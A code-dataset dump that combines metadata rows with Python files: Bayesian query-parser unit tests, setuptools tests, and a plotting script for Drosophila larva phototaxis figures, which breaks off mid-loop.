| 18.6 | 28 | 0.806452 | 26 | 186 | 5.615385 | 0.5 | 0.410959 | 0.616438 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018987 | 0.150538 | 186 | 9 | 29 | 20.666667 | 0.905063 | 0 | 0 | 0 | 0 | 0 | 0.075269 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.714286 | 0 | 0.714286 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4b31b918bb223798711dae59c5004d78b0768b10 | 18 | py | Python | cvc5_z3py_compat/__init__.py | aniemetz/cvc5_pythonic_api | 57d8c9d67e030a13296a94cf6ad7241f59192574 | [
"BSD-3-Clause"
] | null | null | null | cvc5_z3py_compat/__init__.py | aniemetz/cvc5_pythonic_api | 57d8c9d67e030a13296a94cf6ad7241f59192574 | [
"BSD-3-Clause"
] | null | null | null | cvc5_z3py_compat/__init__.py | aniemetz/cvc5_pythonic_api | 57d8c9d67e030a13296a94cf6ad7241f59192574 | [
"BSD-3-Clause"
] | null | null | null | from .z3 import *
| 9 | 17 | 0.666667 | 3 | 18 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 0.222222 | 18 | 1 | 18 | 18 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4b7b35fce0bf989f98afc3a36c319585cb8a33fd | 9,761 | py | Python | bayesian_inference/probability/unit_test.py | yakuza8/bayesian-inference | a639e147c153cad85286ba7a04801164b5c82ac2 | [
"MIT"
] | 3 | 2020-06-19T05:37:44.000Z | 2022-02-02T02:15:45.000Z | bayesian_inference/probability/unit_test.py | yakuza8/bayesian-inference | a639e147c153cad85286ba7a04801164b5c82ac2 | [
"MIT"
] | null | null | null | bayesian_inference/probability/unit_test.py | yakuza8/bayesian-inference | a639e147c153cad85286ba7a04801164b5c82ac2 | [
"MIT"
] | null | null | null | from unittest import TestCase
from .probability import query_parser, QueryVariable
from ..exceptions.exceptions import NonUniqueRandomVariablesInQuery, RandomVariableNotInContext
__all__ = []
class TestProbabilityParser(TestCase):
def test_valid_expression_1(self):
query = 'A'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A')], queries)
self.assertListEqual([], evidences)
def test_valid_expression_2(self):
query = 'A, B, C'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A'), QueryVariable('B'), QueryVariable('C')], queries)
self.assertListEqual([], evidences)
def test_valid_expression_3(self):
query = 'A, B = b, C = c, D'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A'), QueryVariable('B', 'b'), QueryVariable('C', 'c'),
QueryVariable('D')], queries)
self.assertListEqual([], evidences)
def test_valid_expression_4(self):
query = 'B = b, A, C, D = D'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('B', 'b'), QueryVariable('A'), QueryVariable('C'),
QueryVariable('D', 'D')], queries)
self.assertListEqual([], evidences)
def test_valid_expression_5(self):
query = 'A,B=b,C,D,E,F=f,G'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual(
[QueryVariable('A'), QueryVariable('B', 'b'), QueryVariable('C'), QueryVariable('D'),
QueryVariable('E'), QueryVariable('F', 'f'), QueryVariable('G')], queries)
self.assertListEqual([], evidences)
def test_valid_expression_6(self):
query = ' B = b , A , C , D = D '
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('B', 'b'), QueryVariable('A'), QueryVariable('C'),
QueryVariable('D', 'D')], queries)
self.assertListEqual([], evidences)
def test_valid_expression_7(self):
query = 'A, B=b, C | D = d'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A'), QueryVariable('B', 'b'), QueryVariable('C')],
queries)
self.assertListEqual([QueryVariable('D', 'd')], evidences)
def test_valid_expression_8(self):
query = 'A, B=b, C | D = d, E = e'
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A'), QueryVariable('B', 'b'), QueryVariable('C')],
queries)
self.assertListEqual([QueryVariable('D', 'd'), QueryVariable('E', 'e')], evidences)
def test_valid_expression_9(self):
query = 'A, B=b, C |D=d,E=e, F = f '
value, queries, evidences = query_parser(query=query)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A'), QueryVariable('B', 'b'), QueryVariable('C')],
queries)
self.assertListEqual(
[QueryVariable('D', 'd'), QueryVariable('E', 'e'), QueryVariable('F', 'f')], evidences)
def test_invalid_expression_1(self):
query = ''
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_2(self):
query = ','
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_3(self):
query = ' , | '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_4(self):
query = 'A ,'
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_5(self):
query = ', A'
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_6(self):
query = 'A | '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_7(self):
query = 'A = a |'
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_8(self):
query = 'A = a | , '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_9(self):
query = 'A = , '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_10(self):
query = 'A = |'
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_11(self):
query = 'A = a | B'
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_12(self):
query = 'A = a | B, '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_13(self):
query = 'A = a | B = b, '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_14(self):
query = 'A = a, C | B = b | K '
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_invalid_expression_15(self):
query = 'A K = a, C | B = b'
value, queries, evidences = query_parser(query=query)
self.assertFalse(value)
def test_non_unique_valid_expression_1(self):
query = 'A, B, C, A, G'
with self.assertRaises(NonUniqueRandomVariablesInQuery):
query_parser(query=query)
def test_non_unique_valid_expression_2(self):
query = 'A, B, C | A = a, G = g'
with self.assertRaises(NonUniqueRandomVariablesInQuery):
query_parser(query=query)
def test_non_unique_valid_expression_3(self):
query = 'K | A = a, B = b, C = c, A = a, G = g'
with self.assertRaises(NonUniqueRandomVariablesInQuery):
query_parser(query=query)
def test_all_variables_exist_1(self):
query = 'A, B=b, C, D=d | E=e, F=ff, G=g, H=hh'
context = {
'A': ['a', 'aa'], 'B': ['b', 'bb'], 'C': ['c', 'cc'], 'D': ['d', 'dd'],
'E': ['e', 'ee'], 'F': ['f', 'ff'], 'G': ['g', 'gg'], 'H': ['h', 'hh']
}
value, queries, evidences = query_parser(query=query, expected_symbol_and_values=context)
self.assertTrue(value)
self.assertListEqual([QueryVariable('A'), QueryVariable('B', 'b'), QueryVariable('C'),
QueryVariable('D', 'd')], queries)
self.assertListEqual(
[QueryVariable('E', 'e'), QueryVariable('F', 'ff'), QueryVariable('G', 'g'),
QueryVariable('H', 'hh')], evidences)
def test_all_variables_exist_2(self):
query = 'A, B=b, C, D=d | E=e, F=ff, G=g, H=hh'
context = {
'A': ['a', 'aa'], 'B': ['b', 'bb'], 'D': ['d', 'dd'], 'E': ['e', 'ee'],
'F': ['f', 'ff'], 'G': ['g', 'gg'], 'H': ['h', 'hh']
}
with self.assertRaises(RandomVariableNotInContext) as e:
query_parser(query=query, expected_symbol_and_values=context)
self.assertTrue('C' in str(e.exception))
def test_all_variables_exist_3(self):
query = 'A, B=b, C, D=d | E=e, F=ff, G=g, H=hh'
context = {
'A': ['a', 'aa'], 'C': ['c', 'cc'], 'D': ['d', 'dd'], 'E': ['e', 'ee'],
'F': ['f', 'ff'], 'G': ['g', 'gg'], 'H': ['h', 'hh']
}
with self.assertRaises(RandomVariableNotInContext) as e:
query_parser(query=query, expected_symbol_and_values=context)
self.assertTrue('B' in str(e.exception))
def test_all_variables_exist_4(self):
query = 'A, B=b, C, D=d | E=e, F=ff, G=g, H=hh'
context = {
'A': ['a', 'aa'], 'B': ['bb'], 'C': ['c', 'cc'], 'D': ['d', 'dd'], 'E': ['e', 'ee'],
'F': ['f', 'ff'], 'G': ['g', 'gg'], 'H': ['h', 'hh']
}
with self.assertRaises(RandomVariableNotInContext) as e:
query_parser(query=query, expected_symbol_and_values=context)
self.assertTrue('B' in str(e.exception))
def test_all_variables_exist_5(self):
query = 'A, B=b, C, D=d | E=e, F=ff, G=g, H=hh'
context = {
'A': ['a', 'aa'], 'B': ['b', 'bb'], 'C': ['c', 'cc'], 'D': ['d', 'dd'],
'E': ['e', 'ee'], 'G': ['g', 'gg'], 'H': ['h', 'hh']
}
with self.assertRaises(RandomVariableNotInContext) as e:
query_parser(query=query, expected_symbol_and_values=context)
self.assertTrue('F' in str(e.exception))
def test_all_variables_exist_6(self):
query = 'A, B=b, C, D=d | E=e, F=ff, G=g, H=hh'
context = {
'A': ['a', 'aa'], 'B': ['b', 'bb'], 'C': ['c', 'cc'], 'D': ['d', 'dd'],
'E': ['e', 'ee'], 'F': ['f', 'ff'], 'G': ['gg'], 'H': ['h', 'hh']
}
with self.assertRaises(RandomVariableNotInContext) as e:
query_parser(query=query, expected_symbol_and_values=context)
self.assertTrue('G' in str(e.exception))
| 39.840816 | 99 | 0.569921 | 1,159 | 9,761 | 4.655738 | 0.062985 | 0.069311 | 0.09785 | 0.128428 | 0.924203 | 0.89066 | 0.878058 | 0.871386 | 0.82487 | 0.799666 | 0 | 0.005425 | 0.263498 | 9,761 | 244 | 100 | 40.004098 | 0.745166 | 0 | 0 | 0.535354 | 0 | 0.035354 | 0.087389 | 0 | 0 | 0 | 0 | 0 | 0.292929 | 1 | 0.166667 | false | 0 | 0.015152 | 0 | 0.186869 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4b9a975edb897ebaa2736161c7849bc0b94b62cb | 900 | py | Python | test/test_setuptools.py | douardda/tidypy | 9d4c6470af8e0ca85209333a99787290f36498d4 | [
"MIT"
] | null | null | null | test/test_setuptools.py | douardda/tidypy | 9d4c6470af8e0ca85209333a99787290f36498d4 | [
"MIT"
] | null | null | null | test/test_setuptools.py | douardda/tidypy | 9d4c6470af8e0ca85209333a99787290f36498d4 | [
"MIT"
] | null | null | null |
import sys
import subprocess
import pytest
@pytest.mark.skipif(sys.platform == 'win32', reason='windows hates setuptools')
def test_default():
proc = subprocess.Popen(
['python', 'setup.py', 'tidypy'],
cwd='test/project1',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
out, err = proc.communicate()
assert out.startswith('running tidypy')
assert proc.returncode == 0
@pytest.mark.skipif(sys.platform == 'win32', reason='windows hates setuptools')
def test_options():
proc = subprocess.Popen(
['python', 'setup.py', 'tidypy', '--fail-on-issue', '--project-path=test/project1'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
out, err = proc.communicate()
assert out.startswith('running tidypy')
assert proc.returncode == 1
| 25 | 92 | 0.648889 | 100 | 900 | 5.8 | 0.44 | 0.096552 | 0.055172 | 0.065517 | 0.865517 | 0.865517 | 0.865517 | 0.734483 | 0.734483 | 0.734483 | 0 | 0.011236 | 0.208889 | 900 | 35 | 93 | 25.714286 | 0.803371 | 0 | 0 | 0.538462 | 0 | 0 | 0.202673 | 0.03118 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.076923 | false | 0 | 0.115385 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4ba1b42e2017e44331fb938675e1b792a9190d02 | 24,662 | py | Python | figure2_plot.py | arminbahl/drosophila_phototaxis_paper | e01dc95675f835926c9104b34bf6cfd7244dee2b | [
"MIT"
] | null | null | null | figure2_plot.py | arminbahl/drosophila_phototaxis_paper | e01dc95675f835926c9104b34bf6cfd7244dee2b | [
"MIT"
] | null | null | null | figure2_plot.py | arminbahl/drosophila_phototaxis_paper | e01dc95675f835926c9104b34bf6cfd7244dee2b | [
"MIT"
] | null | null | null | import pandas as pd
from pathlib import Path
import pylab as pl
import my_figure as myfig
from scipy.stats import ttest_ind, ttest_1samp
import numpy as np
from sklearn.linear_model import LinearRegression
root_path = Path("/Users/arminbahl/Desktop/preprocessed data/maxwell_paper")
# df = pd.read_hdf(root_path / "all_events.h5", key="results_figure2")
# df_histogram_results = pd.read_hdf(root_path / "all_events.h5", key="results_figure2_histograms")
# df_event_triggered_luminance = pd.read_hdf(root_path / "all_events.h5", key="event_triggered_luminance")
df = pd.read_hdf(root_path / "all_events_model_profile1.h5", key="results_figure2")
df_histogram_results = pd.read_hdf(root_path / "all_events_model_profile1.h5", key="results_figure2_histograms")
df_event_triggered_luminance = pd.read_hdf(root_path / "all_events_model_profile1.h5", key="event_triggered_luminance")
#df.to_excel(root_path / "all_events_figure2.xlsx", sheet_name="all_events_model.h5")
#df.groupby("experiment_name").mean().to_excel(root_path / "all_events_model_figure2_experiment_mean.xlsx", sheet_name="all_data")
fig = myfig.Figure(title="Figure 2")
##########
p0 = myfig.Plot(fig, num='a', xpos=1.5, ypos=22, plot_height=0.75, plot_width=1.5,
lw=1, pc='white', errorbar_area=False,
xl="Turn angle (deg)", xmin=-181, xmax=181, xticks=[-180, -90, 0, 90, 180],
yl="Probability", ymin=-0.001, ymax=0.012)
df_selected = df_histogram_results.query("experiment_name == 'virtual_valley_stimulus_drosolarva' and histogram_type == 'angle_change'").reset_index(level=['experiment_name', 'histogram_type'], drop=True)
myfig.Bar(p0, x=df_selected.index, y=df_selected["density"].values, lc='C0', lw=0, width=0.95*362/60)
##########
p0 = myfig.Plot(fig, num='b', xpos=4.5, ypos=22, plot_height=0.75, plot_width=1.5,
lw=1, pc='white', errorbar_area=False,
xl="Run length (s)", xmin=-0.5, xmax=60.5, xticks=[0, 30, 60],
yl="Probability", ymin=-0.001, ymax=0.06)
df_selected = df_histogram_results.query("experiment_name == 'virtual_valley_stimulus_drosolarva' and histogram_type == 'run_length'").reset_index(level=['experiment_name', 'histogram_type'], drop=True)
myfig.Bar(p0, x=df_selected.index, y=df_selected["density"].values, lc='C0', lw=0, width=0.95*61/60)
##########
df_selected = df_histogram_results.query("experiment_name == 'virtual_valley_stimulus_drosolarva' and histogram_type == 'luminance_change_since_previous_turn_event'").reset_index(level=['experiment_name', 'histogram_type'], drop=True)
p0 = myfig.Plot(fig, num='b', xpos=7.5, ypos=22, plot_height=0.75, plot_width=1.5,
lw=1, pc='white', errorbar_area=False,
xl="Brightness change during runs", xmin=-81, xmax=81, xticks=[-80, -40, 0, 40, 80],
yl="Probability", ymin=-0.001, ymax=df_selected["density"].values.max())
myfig.Bar(p0, x=df_selected.index, y=df_selected["density"].values, lc='C0', lw=0, width=0.95*162/60)
##########
df_selected = df_histogram_results.query("experiment_name == 'virtual_valley_stimulus_drosolarva' and histogram_type == 'luminance_change_during_current_turn_event'").reset_index(level=['experiment_name', 'histogram_type'], drop=True)
p0 = myfig.Plot(fig, num='b', xpos=10.5, ypos=22, plot_height=0.75, plot_width=1.5,
lw=1, pc='white', errorbar_area=False,
xl="Brightness change during turns", xmin=-81, xmax=81, xticks=[-80, -40, 0, 40, 80],
yl="Probability", ymin=-0.001, ymax=df_selected["density"].values.max())
myfig.Bar(p0, x=df_selected.index, y=df_selected["density"].values, lc='C0', lw=0, width=0.95*162/60)
##########
p0 = myfig.Plot(fig, num='e', xpos=14, ypos=22, plot_height=2, plot_width=1.5,
lw=1, pc='white', errorbar_area=True, hlines=[0], vlines=[0],
xl="Time relative to turn event (s)", xmin=-21.5, xmax=21.5, xticks=[-20, -10, 0, 10, 20],
yl="Brightness relative to turn event", ymin=-21, ymax=6, yticks=[-20, -10, 0])
myfig.Line(p0, x=df_event_triggered_luminance.index,
y=df_event_triggered_luminance.means_experiment,
yerr=df_event_triggered_luminance.sems_experiment,
lc='C0', lw=0.5, zorder=1)
myfig.Line(p0, x=df_event_triggered_luminance.index,
y=df_event_triggered_luminance.means_control,
yerr=df_event_triggered_luminance.sems_control,
lc='gray', lw=0.5, zorder=1)
##########
for experiment_name, x_pos, y_pos, color in [["virtual_valley_stimulus_drosolarva", 2, 19, "C0"],
["virtual_valley_stimulus_control_drosolarva", 2, 17, "gray"]]:
p0 = myfig.Plot(fig, num='b', xpos=x_pos, ypos=y_pos, plot_height=1.25, plot_width=0.375*24,
lw=1, pc='white', errorbar_area=False,
xl="", xmin=-0.5, xmax=23.5, xticks=[0, 1, 2.5, 3.5],
xticklabels=["Dark at current turn event",
"Bright at current turn event",
"Darkening since previous turn event",
"Brightening since previous turn event"] if experiment_name == "virtual_valley_stimulus_control_drosolarva" else [""]*4,
xticklabels_rotation=45,
yl="Absolute angle change (°)", ymin=-5, ymax=65, yticks=[0, 30, 60])
for i in range(2):
if i == 0:
angle_change0 = df.query("experiment_name == @experiment_name")[f"angle_change_at_current_turn_event_if_dark_at_current_turn_event"]
angle_change1 = df.query("experiment_name == @experiment_name")[f"angle_change_at_current_turn_event_if_bright_at_current_turn_event"]
if i == 1:
angle_change0 = df.query("experiment_name == @experiment_name")[f"angle_change_at_current_turn_event_if_darkening_since_previous_turn_event"]
angle_change1 = df.query("experiment_name == @experiment_name")[f"angle_change_at_current_turn_event_if_brightening_since_previous_turn_event"]
for j in range(len(angle_change0)):
x1 = np.random.random() * 0.2 - 0.1 + [0, 1, 2.5, 3.5, 6, 7, 8.5, 9.5, 11, 12, 13.5, 14.5, 16, 17, 19.5, 20.5, 22, 23][i * 2]
x2 = np.random.random() * 0.2 - 0.1 + [0, 1, 2.5, 3.5, 6, 7, 8.5, 9.5, 11, 12, 13.5, 14.5, 16, 17, 19.5, 20.5, 22, 23][i * 2 + 1]
y1 = angle_change0[j]
y2 = angle_change1[j]
myfig.Line(p0, x=[x1, x2], y=[y1, y2], lc=color, lw=0.25, zorder=1, alpha=0.5)
myfig.Scatter(p0, x=[x1], y=[y1], lc=color, pt='o', lw=0.25, ps=2, pc='white', zorder=2, alpha=0.5)
myfig.Scatter(p0, x=[x2], y=[y2], lc=color, pt='o', lw=0.25, ps=2, pc='white', zorder=2, alpha=0.5)
x1 = [0, 1, 2.5, 3.5][i * 2]
x2 = [0, 1, 2.5, 3.5][i * 2 + 1]
y1 = np.mean(angle_change0)
y2 = np.mean(angle_change1)
myfig.Line(p0, x=[x1, x2], y=[y1, y2], lc=color, lw=1, zorder=3, alpha=0.9)
myfig.Line(p0, x=[x1, x2], y=[y1, y2], lc=color, lw=1, zorder=3, alpha=0.9)
myfig.Scatter(p0, x=[x1, x2], y=[y1, y2], lc=color, pt='o', lw=0.25, ps=2, pc='white', zorder=4, alpha=0.9)
p = ttest_1samp(angle_change0 - angle_change1, 0, nan_policy='omit')[1]
print("Angle change statistical comparison", i, "Experiment", experiment_name, ": p = ", p, np.mean(angle_change0 - angle_change1), "n = ", len(angle_change0 - angle_change1))
myfig.Line(p0, x=[x1 + 0.1, x2 - 0.1], y=[55, 55], lc='black', lw=0.75)
if p < 0.001:
myfig.Text(p0, x1 + 0.5, 60, "***")
elif p < 0.01:
myfig.Text(p0, x1 + 0.5, 60, "**")
elif p < 0.05:
myfig.Text(p0, x1 + 0.5, 60, "*")
else:
myfig.Text(p0, x1 + 0.5, 60, "ns")
##########
for experiment_name, x_pos, y_pos, color in [["virtual_valley_stimulus_drosolarva", 2, 11, 'C0'],
["virtual_valley_stimulus_control_drosolarva", 2, 9, "gray"]]:
p0 = myfig.Plot(fig, num='b', xpos=x_pos, ypos=y_pos, plot_height=1.25, plot_width=0.375*24,
lw=1, pc='white', errorbar_area=False,
xl="", xmin=-0.5, xmax=23.5, xticks=[0, 1, 2.5, 3.5],
xticklabels=["Dark at current turn event",
"Bright at current turn event",
"Darkening since previous turn event",
"Brightening since previous turn event",
] if experiment_name == "virtual_valley_stimulus_control_drosolarva" else [""]*4,
xticklabels_rotation=45,
yl="Time since previous turn event (s)", ymin=-1, ymax=51, yticks=[0, 25, 50])
for i in range(2):
if i == 0:
run_length0 = df.query("experiment_name == @experiment_name")[f"time_since_previous_turn_event_at_current_turn_event_if_dark_at_current_turn_event"]
run_length1 = df.query("experiment_name == @experiment_name")[f"time_since_previous_turn_event_at_current_turn_event_if_bright_at_current_turn_event"]
if i == 1:
run_length0 = df.query("experiment_name == @experiment_name")[f"time_since_previous_turn_event_at_current_turn_event_if_darkening_since_previous_turn_event"]
run_length1 = df.query("experiment_name == @experiment_name")[f"time_since_previous_turn_event_at_current_turn_event_if_brightening_since_previous_turn_event"]
for j in range(len(angle_change0)):
x1 = np.random.random() * 0.2 - 0.1 + [0, 1, 2.5, 3.5][i * 2]
x2 = np.random.random() * 0.2 - 0.1 + [0, 1, 2.5, 3.5][i * 2 + 1]
y1 = run_length0[j]
y2 = run_length1[j]
myfig.Line(p0, x=[x1, x2], y=[y1, y2], lc=color, lw=0.25, zorder=1, alpha=0.5)
myfig.Scatter(p0, x=[x1], y=[y1], lc=color, pt='o', lw=0.25, ps=1, pc='white', zorder=2, alpha=0.5)
myfig.Scatter(p0, x=[x2], y=[y2], lc=color, pt='o', lw=0.25, ps=1, pc='white', zorder=2, alpha=0.5)
x1 = [0, 1, 2.5, 3.5][i * 2]
x2 = [0, 1, 2.5, 3.5][i * 2 + 1]
y1 = np.mean(run_length0)
y2 = np.mean(run_length1)
myfig.Line(p0, x=[x1, x2], y=[y1, y2], lc=color, lw=1, zorder=3, alpha=0.9)
myfig.Line(p0, x=[x1, x2], y=[y1, y2], lc=color, lw=1, zorder=3, alpha=0.9)
myfig.Scatter(p0, x=[x1, x2], y=[y1, y2], lc=color, pt='o', lw=0.25, ps=2, pc='white', zorder=4, alpha=0.9)
p = ttest_1samp(run_length0 - run_length1, 0, nan_policy='omit')[1]
print("Run length statistical comparison", i, "Experiment", experiment_name, ": p = ", p, np.mean(run_length0 - run_length1), "n = ", len(run_length0 - run_length1))
myfig.Line(p0, x=[x1 + 0.1, x2 - 0.1], y=[50, 50], lc='black', lw=0.75)
if p < 0.001:
myfig.Text(p0, x1 + 0.5, 55, "***")
elif p < 0.01:
myfig.Text(p0, x1 + 0.5, 55, "**")
elif p < 0.05:
myfig.Text(p0, x1 + 0.5, 55, "*")
else:
myfig.Text(p0, x1 + 0.5, 55, "ns")
# Luminance change
##########
for experiment_name, x_pos, y_pos, color in [["virtual_valley_stimulus_drosolarva", 19, 19, "C0"],
["virtual_valley_stimulus_control_drosolarva", 19, 15, "gray"]]:
p0 = myfig.Plot(fig, num='e', xpos=x_pos, ypos=y_pos, plot_height=1.25, plot_width=0.375*3,
lw=1, pc='white', errorbar_area=False,
xl="", xmin=-0.5, xmax=2.5, xticks=[0, 1, 2], xticklabels=["Since previous turn event",
"During turn event", "kk"], xticklabels_rotation=45,
yl="Absolute brightness change", ymin=-5, ymax=65, yticks=[0, 30, 60])
for j in range(len(df.query("experiment_name == @experiment_name"))):
for i in range(2):
if i == 0:
luminance_change = df.query("experiment_name == @experiment_name")[f"luminance_change_since_previous_turn_event"]
if i == 1:
luminance_change = df.query("experiment_name == @experiment_name")[f"luminance_change_during_current_turn_event"]
x = np.random.random() * 0.2 - 0.1 + i
y = luminance_change[j]
myfig.Scatter(p0, x=[x], y=[y], lc=color, pt='o', lw=0.5, ps=2, pc='white', zorder=2, alpha=0.5)
if i > 0:
myfig.Line(p0, x=[x, previous_x], y=[y, previous_y], lc=color, lw=0.5, zorder=1, alpha=0.5)
previous_x = x
previous_y = y
for i in range(1):
if i == 0:
p = ttest_1samp(df.query("experiment_name == @experiment_name")[f"luminance_change_since_previous_turn_event"] -
df.query("experiment_name == @experiment_name")[f"luminance_change_during_current_turn_event"], 0, nan_policy='omit')[1]
myfig.Line(p0, x=[0.1 + i, 0.9 + i], y=[62, 62], lc='black', lw=0.75)
if p < 0.001:
myfig.Text(p0, 0.5 + i, 65, "***")
elif p < 0.01:
myfig.Text(p0, 0.5 + i, 65, "**")
elif p < 0.05:
myfig.Text(p0, 0.5 + i, 65, "*")
else:
myfig.Text(p0, 0.5 + i, 65, "ns")
# The individual event analsis
df = pd.read_hdf(root_path / "all_events_model_profile1.h5", key="all_events")
#df = pd.read_hdf(root_path / "all_events.h5", key="all_events")
for experiment_name in ["virtual_valley_stimulus_drosolarva", "virtual_valley_stimulus_control_drosolarva"]:
if experiment_name == "virtual_valley_stimulus_drosolarva":
ypos = 8
color = 'C0'
else:
ypos = 3
color = 'gray'
df_selected = df.query("experiment_name == @experiment_name and time_at_current_turn_event > 15*60 and time_at_current_turn_event <= 60*60")
df_selected.loc[:, "r_at_previous_turn_event"] = df_selected["r_at_current_turn_event"].shift(1).copy()
df_selected.loc[:, "r_at_next_turn_event"] = df_selected["r_at_current_turn_event"].shift(-1).copy()
df_selected = df_selected.query("r_at_current_turn_event < 5.9 and r_at_previous_turn_event < 5.9 and r_at_next_turn_event < 5.9")
p0 = myfig.Plot(fig, num='b', xpos=10, ypos=ypos, plot_height=1.25, plot_width=2,
lw=1, pc='white', errorbar_area=False,
xl="Brightness", xmin=-5, xmax=181, xticks=[0, 90, 180],
yl="Absolute turn angle", ymin=-1, ymax=41, yticks=[0, 20, 40])
df_selected1 = df_selected.query("angle_change_at_current_turn_event < 41 and "
"angle_change_at_current_turn_event > -41 and "
"luminance_at_current_turn_event < 181")[["luminance_at_current_turn_event",
"angle_change_at_current_turn_event"]]
myfig.Scatter(p0, x=df_selected1["luminance_at_current_turn_event"],
y=df_selected1["angle_change_at_current_turn_event"].abs(),
lc=None, lw=0, pt='.', ps=1, pc=color, zorder=4, alpha=0.3)
bins = np.arange(0, 161, 40)
vals = []
for bin in bins:
df_ = df_selected1.query("luminance_at_current_turn_event < (@bin + 20) and luminance_at_current_turn_event > (@bin - 20)")
vals.append(df_["angle_change_at_current_turn_event"].abs().median())
myfig.Scatter(p0, x=bins, y=vals, lw=0, pt='.', ps=12, pc=color, zorder=5)
X_median = np.array(bins).reshape(-1, 1)
Y_median = np.array(vals).reshape(-1, 1)
X_raw = np.array(df_selected1["luminance_at_current_turn_event"]).reshape(-1, 1)
Y_raw = np.array(df_selected1["angle_change_at_current_turn_event"].abs()).reshape(-1, 1)
linear_regressor_median = LinearRegression() # create object for the class
reg_median = linear_regressor_median.fit(X_median, Y_median) # perform linear regression
Y_pred_median = linear_regressor_median.predict(X_median) # make predictions
real_R_median = reg_median.score(X_median, Y_median)
linear_regressor_raw = LinearRegression() # create object for the class
reg_raw = linear_regressor_raw.fit(X_raw, Y_raw) # perform linear regression
Y_pred_raw = linear_regressor_raw.predict(X_raw) # make predictions
real_R_raw = reg_raw.score(X_raw, Y_raw)
# Repeat this but with shuffled data
Rs_shuffled_raw = []
Rs_shuffled_median = []
for shuffle_i in range(1000):
df_selected_shuffled = df_selected1.apply(lambda df_selected1: df_selected1.sample(frac=1).values)
bins = np.arange(0, 161, 40)
vals = []
for bin in bins:
df_ = df_selected_shuffled.query(
"luminance_at_current_turn_event < (@bin + 20) and luminance_at_current_turn_event > (@bin - 20)")
vals.append(df_["angle_change_at_current_turn_event"].abs().median())
X_shuffled_median = np.array(bins).reshape(-1, 1)
Y_shuffled_median = np.array(vals).reshape(-1, 1)
X_shuffled_raw = np.array(df_selected_shuffled["luminance_at_current_turn_event"]).reshape(-1, 1)
Y_shuffled_raw = np.array(df_selected_shuffled["angle_change_at_current_turn_event"].abs()).reshape(-1, 1)
linear_regressor_shuffled_median = LinearRegression() # create object for the class
reg_shuffled_median = linear_regressor_shuffled_median.fit(X_shuffled_median, Y_shuffled_median) # perform linear regression
Y_pred_shuffled_median = linear_regressor_shuffled_median.predict(X_shuffled_median) # make predictions
real_R_shuffled_median = reg_shuffled_median.score(X_shuffled_median, Y_shuffled_median)
linear_regressor_shuffled_raw = LinearRegression() # create object for the class
reg_shuffled_raw = linear_regressor_shuffled_raw.fit(X_shuffled_raw, Y_shuffled_raw) # perform linear regression
Y_pred_shuffled_raw = linear_regressor_shuffled_raw.predict(X_shuffled_raw) # make predictions
real_R_shuffled_raw = reg_raw.score(X_shuffled_raw, Y_shuffled_raw)
Rs_shuffled_median.append(real_R_shuffled_median)
